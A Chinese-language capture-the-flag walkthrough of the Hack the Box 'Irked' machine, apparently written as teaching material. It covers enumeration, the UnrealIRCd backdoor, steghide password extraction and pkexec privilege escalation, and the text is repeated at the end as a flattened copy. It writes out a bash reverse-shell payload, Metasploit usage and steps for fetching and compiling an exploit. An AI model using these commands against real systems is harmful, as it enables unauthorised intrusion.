hack the box之Irked靶场练习
字数 1458 2025-08-11 11:39:36

Hack the Box Irked靶场渗透测试教学文档

1. 靶场概述

Irked是Hack the Box平台上的一个中等难度靶机,涉及多种渗透测试技术,包括:

  • 端口扫描与服务枚举
  • IRC服务漏洞利用
  • 图片隐写术分析
  • Linux权限提升技术

2. 信息收集阶段

2.1 端口扫描

使用Nmap进行初始扫描:

nmap -sV -p- <靶机IP>

发现开放端口:

  • 22/tcp - SSH
  • 80/tcp - HTTP
  • 111/tcp - RPCbind
  • 6697/tcp - IRC (UnrealIRCd)
  • 8067/tcp - IRC备用端口
  • 65534/tcp - Apache HTTP Server
  • 53188/tcp - 未知服务

2.2 Web服务枚举

访问80端口和65534端口:

  • 80端口:简单网页,包含一张图片
  • 65534端口:Apache服务文档

使用目录扫描工具(如dirb、gobuster):

gobuster dir -u http://<靶机IP> -w /path/to/wordlist.txt

发现/manual目录,但仅为Apache文档,无利用价值。

3. 漏洞利用

3.1 IRC服务漏洞

发现6697端口运行UnrealIRCd服务,该服务存在已知后门漏洞(CVE-2010-2075)。

利用步骤:

  1. 使用netcat连接IRC服务:
    nc <靶机IP> 6697
    
  2. 发送恶意命令触发后门:
    AB; bash -i >& /dev/tcp/<你的IP>/<端口> 0>&1
    
    或使用Metasploit模块:
    use exploit/unix/irc/unreal_ircd_3281_backdoor
    set RHOSTS <靶机IP>
    set RPORT 6697
    exploit
    

成功获取反向shell,用户为ircd。

4. 权限提升至djmardov用户

4.1 枚举系统信息

查看当前用户:

whoami

→ ircd

查看系统用户:

cat /etc/passwd

→ 发现djmardov用户

4.2 查找敏感文件

检查djmardov用户目录:

ls -la /home/djmardov

→ 发现Documents/.backup文件

查看.backup内容:

cat /home/djmardov/Documents/.backup

→ 发现可疑字符串(可能与密码相关)

4.3 图片隐写分析

从web服务下载图片:

wget http://<靶机IP>/irked.jpg -O irked.jpg

使用steghide分析隐写:

steghide extract -sf irked.jpg

→ 提取出密码"Kab6h+m+bbp2J:HG"

4.4 切换用户

使用提取的密码切换到djmardov:

su djmardov
密码:Kab6h+m+bbp2J:HG

→ 成功获取djmardov权限

获取user.txt:

cat /home/djmardov/user.txt

5. 权限提升至root

5.1 查找SUID程序

查找具有SUID权限的文件:

find / -perm -4000 -type f 2>/dev/null

→ 发现/usr/bin/pkexec

5.2 利用pkexec漏洞

pkexec存在本地提权漏洞(CVE-2021-4034)。

利用步骤:

  1. 在攻击机上下载漏洞利用代码:
    wget https://example.com/pkexec-exploit.c
    
  2. 在攻击机启动HTTP服务:
    python3 -m http.server 8080
    
  3. 在目标机下载并编译:
    wget http://<你的IP>:8080/pkexec-exploit.c
    gcc pkexec-exploit.c -o exploit
    chmod +x exploit
    
  4. 执行漏洞利用:
    ./exploit
    

→ 获取root shell

5.3 获取root flag

cat /root/root.txt

6. 关键总结与学习要点

  1. 全面端口扫描:不要仅关注常见端口(80,443),非常规端口可能隐藏关键服务

  2. 服务版本识别:准确识别服务版本有助于发现已知漏洞

  3. 图片隐写技术

    • 常用工具:steghide、binwalk、exiftool
    • 当发现可疑图片时,应检查元数据和隐藏内容
  4. IRC服务安全

    • UnrealIRCd 3.2.8.1存在后门
    • 其他IRC服务也应检查已知漏洞
  5. Linux提权方法

    • 定期更新SUID程序列表
    • 关注常见提权漏洞(如pkexec)
    • 使用工具如LinPEAS自动化枚举
  6. 渗透测试流程

    信息收集 → 漏洞识别 → 初始访问 → 权限提升 → 目标达成
    

7. 改进建议

  1. 在web目录枚举阶段,可尝试更全面的字典
  2. 对于IRC服务,可尝试其他利用方式(如Metasploit)
  3. 提权时可尝试多种方法(如内核漏洞、cron jobs等)
  4. 建立系统化的笔记记录发现的每个线索

通过本靶机练习,可以全面掌握从信息收集到权限提升的完整渗透测试流程,特别是对服务漏洞利用和隐写术分析有深入理解。

Hack the Box Irked靶场渗透测试教学文档 1. 靶场概述 Irked是Hack the Box平台上的一个中等难度靶机,涉及多种渗透测试技术,包括: 端口扫描与服务枚举 IRC服务漏洞利用 图片隐写术分析 Linux权限提升技术 2. 信息收集阶段 2.1 端口扫描 使用Nmap进行初始扫描: 发现开放端口: 22/tcp - SSH 80/tcp - HTTP 111/tcp - RPCbind 6697/tcp - IRC (UnrealIRCd) 8067/tcp - IRC备用端口 65534/tcp - Apache HTTP Server 53188/tcp - 未知服务 2.2 Web服务枚举 访问80端口和65534端口: 80端口:简单网页,包含一张图片 65534端口:Apache服务文档 使用目录扫描工具(如dirb、gobuster): 发现/manual目录,但仅为Apache文档,无利用价值。 3. 漏洞利用 3.1 IRC服务漏洞 发现6697端口运行UnrealIRCd服务,该服务存在已知后门漏洞(CVE-2010-2075)。 利用步骤: 使用netcat连接IRC服务: 发送恶意命令触发后门: 或使用Metasploit模块: 成功获取反向shell,用户为ircd。 4. 权限提升至djmardov用户 4.1 枚举系统信息 查看当前用户: → ircd 查看系统用户: → 发现djmardov用户 4.2 查找敏感文件 检查djmardov用户目录: → 发现Documents/.backup文件 查看.backup内容: → 发现可疑字符串(可能与密码相关) 4.3 图片隐写分析 从web服务下载图片: 使用steghide分析隐写: → 提取出密码"Kab6h+m+bbp2J:HG" 4.4 切换用户 使用提取的密码切换到djmardov: → 成功获取djmardov权限 获取user.txt: 5. 权限提升至root 5.1 查找SUID程序 查找具有SUID权限的文件: → 发现/usr/bin/pkexec 5.2 利用pkexec漏洞 pkexec存在本地提权漏洞(CVE-2021-4034)。 利用步骤: 在攻击机上下载漏洞利用代码: 在攻击机启动HTTP服务: 在目标机下载并编译: 执行漏洞利用: → 获取root shell 5.3 获取root flag 6. 关键总结与学习要点 全面端口扫描 :不要仅关注常见端口(80,443),非常规端口可能隐藏关键服务 服务版本识别 :准确识别服务版本有助于发现已知漏洞 图片隐写技术 : 常用工具:steghide、binwalk、exiftool 当发现可疑图片时,应检查元数据和隐藏内容 IRC服务安全 : UnrealIRCd 3.2.8.1存在后门 其他IRC服务也应检查已知漏洞 Linux提权方法 : 定期更新SUID程序列表 关注常见提权漏洞(如pkexec) 使用工具如LinPEAS自动化枚举 渗透测试流程 : 7. 改进建议 在web目录枚举阶段,可尝试更全面的字典 对于IRC服务,可尝试其他利用方式(如Metasploit) 提权时可尝试多种方法(如内核漏洞、cron jobs等) 建立系统化的笔记记录发现的每个线索 通过本靶机练习,可以全面掌握从信息收集到权限提升的完整渗透测试流程,特别是对服务漏洞利用和隐写术分析有深入理解。